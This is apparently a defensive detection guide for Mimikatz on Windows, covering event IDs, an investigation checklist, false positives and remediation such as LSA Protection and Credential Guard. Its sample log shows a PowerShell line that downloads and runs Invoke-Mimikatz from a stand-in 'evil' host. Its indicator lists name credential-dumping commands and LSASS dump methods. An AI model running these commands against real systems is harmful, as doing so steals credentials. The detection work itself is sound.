Detect Mimikatz — LSASS Dumping, DCSync & Credential Theft Indicators

MITRE ATT&CK

Security Relevance

Mimikatz is present in the majority of advanced intrusions, ransomware campaigns, and nation-state operations. Its modular design means a single execution can yield domain-wide credential access: LSASS dumping exposes active user sessions, DCSync yields every domain account hash, and Golden Ticket forgery enables persistence that survives password resets. Detecting even one Mimikatz indicator warrants immediate incident response — it is rarely a false positive and almost always means the environment is already compromised.

Indicators of Malicious Use

• ⚑Event 4688: Process named mimikatz.exe, mimilib.dll, or mimidrv.sys — or any process with 'mimi' in the name
• ⚑Event 4688: Command line contains sekurlsa, lsadump, kerberos::golden, privilege::debug, or token::elevate
• ⚑Event 4663: ObjectName contains lsass.exe, \SAM, ntds.dit, or system32\config — accessed by a user-space process
• ⚑Event 4104: Script block contains Invoke-Mimikatz, DumpCreds, sekurlsa::, or lsadump::
• ⚑Event 4662: Replication GUIDs (1131f6aa, 1131f6ad) from a non-DC account — DCSync module
• ⚑Event 4673: SeDebugPrivilege (SeTcbPrivilege) requested by an unexpected process — Mimikatz requires this to access LSASS
• ⚑Registry modification: HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest → UseLogonCredential = 1 — enables cleartext password caching
• ⚑Sysmon Event 10: GrantedAccess 0x1010, 0x1038, or 0x143a on lsass.exe from a user process

Example Log Entry

Log Name: Security
Event ID:  4688
Level:     Information

A new process has been created.

Creator Subject:
  Account Name:     jsmith
  Account Domain:   CORP

Process Information:
  New Process ID:   0x1a4
  New Process Name: C:\Users\jsmith\Downloads\mimikatz_trunk\x64\mimikatz.exe
  Token Elevation:  TokenElevationTypeFull

--- Also watch for PowerShell variant ---

Event ID: 4104 (PowerShell Script Block)
Script Block Contents:
  Invoke-Mimikatz -DumpCreds
  IEX (New-Object Net.WebClient).DownloadString('http://evil/Invoke-Mimikatz.ps1')

Investigation Steps

1. 1.Search Event 4688 for mimikatz.exe and common variants — attackers frequently rename the binary (svchost.exe, lsass.exe, update.exe). Focus on process path: any LSASS-accessing process in AppData, Temp, Downloads, or a user's home directory is an IOC regardless of name.
2. 2.Check Event 4673 for SeDebugPrivilege — Mimikatz calls privilege::debug before any LSASS operation. The process requesting SeDebugPrivilege should be a known security tool or Windows process. An unexpected requestor narrows the search.
3. 3.Search Event 4104 (PowerShell script blocks) for: Invoke-Mimikatz, sekurlsa, lsadump, DumpCreds, kerberos::golden. Attackers often load Mimikatz entirely in memory via PowerShell to avoid disk-based detection.
4. 4.Check Event 4662 for DCSync activity — the lsadump::dcsync module leaves a distinct 4662 signature with DS-Replication-Get-Changes-All from a user account. If found, treat as a full domain compromise.
5. 5.Search Event 4663 for LSASS access — the sekurlsa modules access lsass.exe memory. The accessing process name will either be mimikatz.exe (if unmodified) or a renamed binary. Cross-reference with 4688 to identify the process.
6. 6.Check for WDigest re-enablement: Event 4657 or 4663 showing writes to HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest with UseLogonCredential = 1. This is a Mimikatz pre-step to ensure future cleartext passwords are cached.
7. 7.Determine what accounts were active on the system — any account logged in during the Mimikatz execution window should be treated as compromised. Check 4624 events for the hour before and after.
8. 8.Assume full compromise and initiate incident response: isolate the host, rotate all credentials active at the time of compromise, perform double krbtgt reset if DCSync was used, and audit for persistence mechanisms (scheduled tasks, new accounts, registry run keys).

Common False Positives

• ◎Penetration testing and red team engagements — Mimikatz is a standard red team tool. Verify against your change management calendar before escalating.
• ◎Security research environments — Mimikatz is used for legitimate security research. Air-gapped or isolated lab environments may trigger these signatures intentionally.
• ◎Windows Defender and EDR testing — some security teams test their detection capabilities by running Mimikatz in controlled environments. Verify with the security team.
• ◎Does Windows Defender detect Mimikatz? Yes — Windows Defender detects known Mimikatz signatures and will generate Event 1116/1117. However, obfuscated or modified versions frequently bypass signature detection. Behavioral indicators (4663, 4673, 4662) remain reliable.

Remediation

• ✓Rotate all credentials active during the compromise window — NTLM hashes extracted from LSASS can be used immediately for pass-the-hash. Every account with an active session on the compromised host is at risk.
• ✓If DCSync was detected, perform a double krbtgt password reset — reset the krbtgt account password, wait 10 hours, then reset it again. This invalidates any forged Golden Tickets.
• ✓Enable LSA Protection (RunAsPPL) — makes LSASS a Protected Process Light, blocking unsigned tools from accessing LSASS memory. Set HKLM\SYSTEM\CurrentControlSet\Control\Lsa → RunAsPPL = 1.
• ✓Enable Credential Guard — stores credentials in a Hyper-V isolated container. Mimikatz's sekurlsa modules cannot extract credentials protected by Credential Guard.
• ✓Disable WDigest authentication — set HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest → UseLogonCredential = 0 (or ensure it is absent). This prevents cleartext password caching.
• ✓Enable Protected Users security group for all privileged accounts — prevents NTLM authentication and Kerberos delegation, significantly reducing the value of extracted hashes.
• ✓Deploy Attack Surface Reduction (ASR) rules — specifically 'Block credential stealing from the Windows local security authority subsystem' (LSASS protection rule).

Related Event IDs

Related Detection Guides

Frequently Asked Questions

Does Windows Defender detect Mimikatz?

Windows Defender Antivirus detects many Mimikatz variants by signature, but attackers routinely bypass detection using obfuscation, reflective loading (running from memory without touching disk), or custom forks. Defender for Identity (requires DC sensor) detects credential theft patterns at the network level. You should not rely on AV alone — assume a motivated attacker has evaded signatures.

Why is lsass.exe being accessed?

LSASS access (Event ID 4663 with the target path pointing to lsass.exe) is triggered by credential dumping tools including Mimikatz sekurlsa::logonpasswords, ProcDump (-ma lsass.exe), Task Manager dump, comsvcs.dll MiniDump, and nanodump. Legitimate LSASS access is rare and comes from known system processes. Any unexpected process accessing LSASS should be investigated.

What event IDs does Mimikatz generate?

Mimikatz generates different events depending on the module used: 4663 (LSASS process access for sekurlsa modules), 4662 (directory service access for lsadump::dcsync), 4104 (PowerShell script block logging if using Invoke-Mimikatz), 4673 (sensitive privilege use for SeDebugPrivilege), and 4657 (registry write if enabling WDigest via misc::wdigest). No single event ID is definitive — correlation across multiple IDs is required.

Can Mimikatz run without administrator rights?

Most Mimikatz modules require SYSTEM or local Administrator rights. sekurlsa::logonpasswords requires SeDebugPrivilege, which requires local admin. lsadump::dcsync requires domain replication rights (Domain Admin or explicitly delegated). Some modules like vault::list and dpapi operate at lower privilege levels but yield less sensitive data.